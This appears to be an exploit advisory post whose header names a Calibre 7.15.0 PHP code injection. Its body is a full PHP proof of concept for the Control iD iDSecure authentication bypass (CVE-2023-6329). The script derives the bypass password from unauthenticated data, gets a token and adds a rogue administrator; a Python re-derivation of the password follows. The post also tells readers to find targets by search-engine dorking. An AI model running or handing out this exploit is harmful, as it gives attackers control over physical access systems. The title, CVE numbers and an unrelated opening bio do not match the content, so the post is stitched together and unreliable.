Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.


=============================================================================================================================================
| # Title     : Calibre 7.15.0 PHP Code Injection Vulnerability                                                                              |
| # Author    : indoushka                                                                                                                    |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                             |
| # Vendor    : https://download.calibre-ebook.com/7.15.0/                                                                                   |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] Code description: the script exploits a vulnerability in the Control iD iDSecure access control system that allows unauthenticated remote attackers to reach the system administration interface and add a new administrative user.

Main steps of the code:

Version check: the code first checks whether the target's reported version is affected by the specified vulnerability (CVE-2023-6329). If the version is affected (less than or equal to 4.7.43.0), the exploit can be executed.

Sensitive data extraction: the code retrieves the serial and passwordRandom values from the target with a GET request to the /api/login/unlockGetData API. These values are used to generate a custom password (passwordCustom), which is part of the authentication process: sha1(serial) is concatenated with passwordRandom and the static string 'cid2016', the result is hashed with SHA-256, and the first six hex digits of that digest, converted to decimal, form passwordCustom. The script then logs in with passwordCustom and passwordRandom to obtain a JWT, adds a new operator via /api/operator/, and confirms that the new credentials work.

( https://packetstorm.news/files/id/180007/ CVE-2024-6782)

[+] Save the code as poc.php.

[+] Set target: edit the $target_uri value in the example usage at the bottom of the script.

[+] Usage : php poc.php

[+] PayLoad :


<?php
// Control iD iDSecure authentication bypass (CVE-2023-6329).
// Flow: check the reported version -> fetch serial/passwordRandom -> derive
// passwordCustom -> log in for a JWT -> add an operator -> verify the new login.

class ControlIDiDSecureAuthBypass {
    private $target_uri;
    private $new_user;
    private $new_password;

    public function __construct($target_uri, $new_user = null, $new_password = null) {
        $this->target_uri = rtrim($target_uri, '/');
        $this->new_user = $new_user ?? bin2hex(random_bytes(4));         // default: random 8-char hex username
        $this->new_password = $new_password ?? bin2hex(random_bytes(6)); // default: random 12-char hex password
    }

    // Check whether a vulnerable version is running. The module only trusts a
    // 401 reply from configUI whose JSON body still carries a "Version" field;
    // any other reply is reported as Unknown.
    public function check() {
        $url = $this->target_uri . '/api/util/configUI';
        $response = $this->send_request($url, 'GET');

        if (!$response || $response['code'] != 401) {
            return 'Unknown';
        }

        $data = json_decode($response['body'], true);
        $version = is_array($data) ? ($data['Version'] ?? null) : null;

        if (is_null($version)) {
            return 'Unknown';
        }

        echo "Got version: $version\n";
        if (version_compare($version, '4.7.43.0', '<=')) {
            return 'Appears';
        }

        return 'Safe';
    }

    // Exploit: derive passwordCustom, obtain a JWT and add a new administrative user.
    public function run() {
        // Step 1: get serial and passwordRandom from the unauthenticated unlock endpoint
        $url = $this->target_uri . '/api/login/unlockGetData';
        $response = $this->send_request($url, 'GET');

        if (!$response) {
            throw new Exception("Failed to receive a reply from the server.");
        }

        $json = json_decode($response['body'], true);
        $password_random = $json['passwordRandom'] ?? null;
        $serial = $json['serial'] ?? null;

        if (!$password_random || !$serial) {
            throw new Exception('Unable to retrieve passwordRandom and serial');
        }

        echo "Retrieved passwordRandom: $password_random\n";
        echo "Retrieved serial: $serial\n";

        // Step 2: create passwordCustom
        //   sha1(serial) . passwordRandom . 'cid2016' -> sha256 -> first 6 hex digits -> decimal
        $sha1_hash = sha1($serial);
        $combined_string = $sha1_hash . $password_random . 'cid2016';
        $sha256_hash = hash('sha256', $combined_string);
        $short_hash = substr($sha256_hash, 0, 6);
        $password_custom = base_convert($short_hash, 16, 10);

        echo "Created passwordCustom: $password_custom\n";

        // Step 3: log in with passwordCustom and passwordRandom to get a JWT
        $body = json_encode([
            'passwordCustom' => $password_custom,
            'passwordRandom' => $password_random
        ]);

        $url = $this->target_uri . '/api/login/';
        $response = $this->send_request($url, 'POST', $body);

        if (!$response) {
            throw new Exception("Failed to receive a reply from the server.");
        }

        $json = json_decode($response['body'], true);
        $access_token = $json['accessToken'] ?? null;

        if (!$access_token) {
            throw new Exception('Did not receive JWT');
        }

        echo "Retrieved JWT: $access_token\n";

        // Step 4: add a new administrative user with the bearer token
        $body = json_encode([
            'idType' => '1',
            'name' => $this->new_user,
            'user' => $this->new_user,
            'newPassword' => $this->new_password,
            'password_confirmation' => $this->new_password
        ]);

        $url = $this->target_uri . '/api/operator/';
        $response = $this->send_request($url, 'POST', $body, $access_token);

        if (!$response) {
            throw new Exception("Failed to receive a reply from the server.");
        }

        $json = json_decode($response['body'], true);
        if (!is_array($json) || ($json['code'] ?? null) !== 200 || ($json['error'] ?? null) !== 'OK') {
            throw new Exception('Unexpected reply from server');
        }

        // Step 5: confirm the new credentials work with a regular username/password login
        $body = json_encode([
            'username' => $this->new_user,
            'password' => $this->new_password,
            'passwordCustom' => null
        ]);

        $url = $this->target_uri . '/api/login/';
        $response = $this->send_request($url, 'POST', $body);

        if (!$response) {
            throw new Exception("Failed to receive a reply from the server.");
        }

        $json = json_decode($response['body'], true);
        if (!is_array($json) || !isset($json['accessToken']) || !isset($json['unlock'])) {
            throw new Exception('Received unexpected reply');
        }

        echo "New user '{$this->new_user}:{$this->new_password}' was successfully added.\n";
        echo "Login at: " . $this->target_uri . "/#/login\n";
    }

    // Helper to send JSON HTTP requests. Returns ['code' => int, 'body' => string],
    // or null on a transport error so the callers' "no reply" checks actually fire.
    private function send_request($url, $method, $body = null, $token = null) {
        $headers = [
            'Content-Type: application/json'
        ];

        if ($token) {
            $headers[] = "Authorization: Bearer $token";
        }

        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
        if ($body !== null) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
        }
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

        $response_body = curl_exec($ch);
        $response_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $curl_error = curl_error($ch);

        curl_close($ch);

        if ($response_body === false) {
            fwrite(STDERR, "curl error for $url: $curl_error\n");
            return null;
        }

        return ['code' => $response_code, 'body' => $response_body];
    }
}

// Example usage: set the target here before running "php poc.php".
$target_uri = 'https://example.com';
$module = new ControlIDiDSecureAuthBypass($target_uri);
if ($module->check() === 'Appears') {
    $module->run();
}
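The version gate in check() and the passwordCustom derivation in step 2 are the whole of the bypass, so here they are again as a stand-alone Python re-implementation. This is an added example, not code from the advisory above or from Control iD; the serial and passwordRandom values are constructed samples, and the only fixed input is the static 'cid2016' suffix the PoC appends. The version comparison uses Python tuple ordering, which reproduces PHP version_compare for purely numeric dotted versions (a shorter prefix such as 4.7 ranks below 4.7.43.0).

```python
"""Added example: re-derives the CVE-2023-6329 passwordCustom value and the
version gate used by the PoC. Sample inputs are constructed, not real devices."""
import hashlib

AFFECTED_MAX_VERSION = (4, 7, 43, 0)   # PoC's check(): version <= 4.7.43.0 is "Appears"
STATIC_SUFFIX = "cid2016"              # static string appended in the PoC's step 2
PASSWORD_CUSTOM_MAX = 16 ** 6 - 1      # six hex digits survive the truncation: 16777215


def parse_version(version: str) -> tuple:
    """Turn a dotted numeric version such as '4.7.43.0' into an int tuple.
    Tuple ordering reproduces PHP version_compare for numeric components:
    a shorter prefix ('4.7') ranks below the longer '4.7.43.0'."""
    parts = []
    for piece in version.strip().split("."):
        if not piece.isdigit():
            raise ValueError(f"non-numeric version component: {piece!r}")
        parts.append(int(piece))
    return tuple(parts)


def is_affected(version: str) -> bool:
    """True when the reported version is <= 4.7.43.0, mirroring check()."""
    return parse_version(version) <= AFFECTED_MAX_VERSION


def derive_password_custom(serial: str, password_random: str) -> str:
    """Recompute passwordCustom from the two values /api/login/unlockGetData
    hands out unauthenticated: sha1(serial) hex + passwordRandom + 'cid2016',
    SHA-256 that, keep the first 6 hex digits, render them in decimal
    (the PoC's base_convert($short_hash, 16, 10))."""
    sha1_hex = hashlib.sha1(serial.encode("utf-8")).hexdigest()
    combined = sha1_hex + password_random + STATIC_SUFFIX
    sha256_hex = hashlib.sha256(combined.encode("utf-8")).hexdigest()
    short_hex = sha256_hex[:6]
    return str(int(short_hex, 16))


def build_login_body(serial: str, password_random: str) -> dict:
    """JSON body the PoC POSTs to /api/login/ in step 3."""
    return {
        "passwordCustom": derive_password_custom(serial, password_random),
        "passwordRandom": password_random,
    }


if __name__ == "__main__":
    # Constructed sample values standing in for a device's unlockGetData reply.
    sample_serial = "SAMPLE-SERIAL-0001"
    sample_random = "482913"

    for v in ("4.7.43.0", "4.7.44.0", "4.8.0.0"):
        print(f"version {v}: {'Appears' if is_affected(v) else 'Safe'}")

    body = build_login_body(sample_serial, sample_random)
    print("login body:", body)
    print("passwordCustom fits in 24 bits:",
          int(body["passwordCustom"]) <= PASSWORD_CUSTOM_MAX)
```

Because only six hex digits of the SHA-256 digest survive the truncation, passwordCustom can never exceed 16777215 (24 bits) whatever the serial and passwordRandom are; and since both inputs and the 'cid2016' suffix are known to anyone who can reach unlockGetData, the value provides no authentication at all on affected versions.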


===================================================================================================
Greetings to : jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
===================================================================================================